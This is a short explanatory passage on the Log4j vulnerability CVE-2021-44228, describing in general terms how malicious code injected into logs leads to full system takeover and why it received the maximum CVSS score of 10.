The Log4j vulnerability, initially reported in November 2021, has affected millions of devices and applications around the world. It has the potential to allow a malicious actor to take full control of vulnerable devices. As a result of how Log4j controls the logging of strings and code, the vulnerability allows malicious actors to inject malicious code into logs, and trick applications into running that malicious code. When exploited, Log4j inflicts profound damage to affected systems and networks, and provides an attacker with full take-over of an affected system. This, combined with the ease with which the vulnerability can be exploited, resulted in the associated Log4j CVE-2021-44228 receiving the unusually high CVSS score of 10, which is the maximum threat score that can be given.
